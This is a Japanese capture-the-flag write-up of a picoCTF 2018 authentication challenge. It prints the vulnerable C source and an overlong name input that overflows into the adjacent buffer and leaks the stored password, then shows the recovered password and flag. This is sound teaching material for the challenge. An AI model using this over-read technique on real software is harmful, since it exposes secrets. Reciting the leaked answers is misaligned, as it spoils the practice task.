$ nc 2018shell.picoctf.com 57659
What is your name?
ctf
Hello ctf,
Please Enter the Password.
ctf
Incorrect Password!

とりあえずサーバに接続してみましたが、ログインできません。
ソースコードを見てみます。

$ cat auth.c
#include
#include
#include
#include
#include

int flag() {
char flag[48];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}

fgets(flag, sizeof(flag), file);
printf("%s", flag);
return 0;
}

int main(int argc, char **argv){

setvbuf(stdout, NULL, _IONBF, 0);

// Set the gid to the effective gid
gid_t gid = getegid();
setresgid(gid, gid, gid);

// real pw:
FILE *file;
char password[64];
char name[256];
char password_input[64];

memset(password, 0, sizeof(password));
memset(name, 0, sizeof(name));
memset(password_input, 0, sizeof(password_input));

printf("What is your name?\n");

fgets(name, sizeof(name), stdin);
char *end = strchr(name, '\n');
if (end != NULL) {
*end = '\x00';
}

strcat(name, ",\nPlease Enter the Password.");

file = fopen("password.txt", "r");
if (file == NULL) {
printf("Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}

fgets(password, sizeof(password), file);

printf("Hello ");
puts(name);

fgets(password_input, sizeof(password_input), stdin);
password_input[sizeof(password_input)] = '\x00';

if (!strcmp(password_input, password)) {
flag();
}
else {
printf("Incorrect Password!\n");
}
return 0;
}

の

char password[64];
char name[256];
char password_input[64];

をみると、オーバーフローさせるとフラグがとれそうです。

$ nc 2018shell.picoctf.com 57659
What is your name?
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjsddddddddddddoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooodffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Hello jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjsddddddddddddoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo,a_reAllY_s3cuRe_p4s$word_56b977

・・・こんな感じに自由に入力すると「a_reAllY_s3cuRe_p4s$word_56b977」という文字列がくっついてきました。パスワードでしょうか？入れてみます。

Please Enter the Password.
a_reAllY_s3cuRe_p4s$word_56b977
picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_2b5cbbaa}

フラグがでてきました。